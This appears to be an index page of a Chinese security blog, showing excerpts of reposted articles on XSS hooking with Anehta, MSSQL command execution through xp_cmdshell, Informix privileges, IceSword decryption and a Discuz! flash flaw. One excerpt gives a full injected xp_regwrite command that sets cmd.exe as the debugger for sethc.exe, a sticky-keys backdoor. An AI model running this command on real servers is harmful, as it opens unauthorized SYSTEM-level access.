鬼仔's Blog

作者：刺

有心的朋友可能已经注意到了，Anehta 中实现了一个客户端Cache。

位置在core里面：
anehta.core.cache = function(){}

在core中我预定义了一个变量，可以让我们很方便的操作cache：

// 初始化一个cache出来共享数据
var anehtaCache = new anehta.core.cache();
阅读全文 »

by amxku
2008-10-29
http://www.amxku.net

在Informix中，有三个数据库特权级别：DBA、Resource 和 Connect
Connect 特权允许用户访问数据库以及添加、修改和删除数据。
Resource 特权授予用户所有 Connect 特权，还授予创建新的表、索引和过程的特权。
DBA 特权包括 Connect 和 Resurce 特权，还授予用户把 Resource、Connect 或DBA 特权授予其他用户的权力。具有DBA 特权的用户还可以删除数据库中的所有对象或完全删除数据库。
阅读全文 »

转载请注明来源：BK瞬间群
首发Web安全手册

////////////////////////////////////////////////////////////////////////
                              sa执行命令方法总结

                                 By 无敌小黄瓜
////////////////////////////////////////////////////////////////////////

测试环境：windows xp pro sp2 + mssql 2005（服务以system权限启动）

一．xp_cmdshell
阅读全文 »

作者：刺

上一篇提到了如何做hook，也讲到了hook表单提交的几种不同方式。

今天要讲的是实现的一点细节。

我们知道，javascript中大部分的method都是非阻塞的，这样的好处是可以提高效率，坏处是很多时候我们确实是需要阻塞的功能。

极少数method是阻塞的，比如 alert()这个函数，在alert()执行完成并返回前，alert()之后的javascript代码都不会执行。
阅读全文 »

作者：MJ0011

icesword同驱动通讯时会将input buffer加密，下面是各版本的解密代码:

包括1.2, 1.18 , 1.2版本的中英文版本

unsigned char is_ddata_en[32] = {
0x10, 0x4F, 0xAC, 0x2D, 0x94, 0x97, 0x95, 0xEE, 0x93, 0x25, 0x8A, 0xB6, 0xD6, 0xBE, 0x49, 0x4D,
0x3F, 0x94, 0x1A, 0x91, 0x30, 0xC4, 0x7B, 0x08, 0x59, 0x38, 0x7C, 0x3B, 0x52, 0x40, 0xD2, 0xD2
};
阅读全文 »

版权所有：BK瞬间群
作者：BK群某饮料

1.能修改注册表
2.能访问3389

exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','debugger','REG_sz','c:\windows\system32\cmd.exe on';--

阅读全文 »

作者：Innfen

上次导数据库的时候不幸把这个导丢了,今天刚好注射攻击的时候,那数据库机器没设置网关,那就自己加一个先试试看了,搞不好可以直接上网了,网关的ip不知道,只好写个批处理来探测,看运气咯
阅读全文 »

author: 80vul-A
team:http://www.80vul.com

一 分析
其实该漏洞在2007年就公布过了[1],但是经过80vul-A测试改漏洞一直没有被修补。该漏洞的分析主要点如下：

第一:Discuz!把allowScriptAccess设置为sameDomain:<param name=”allowScriptAccess” value=”sameDomain”>我们只需要把swf文件上传到目标上就可以使用[flash]调用我们构造的swf了。
阅读全文 »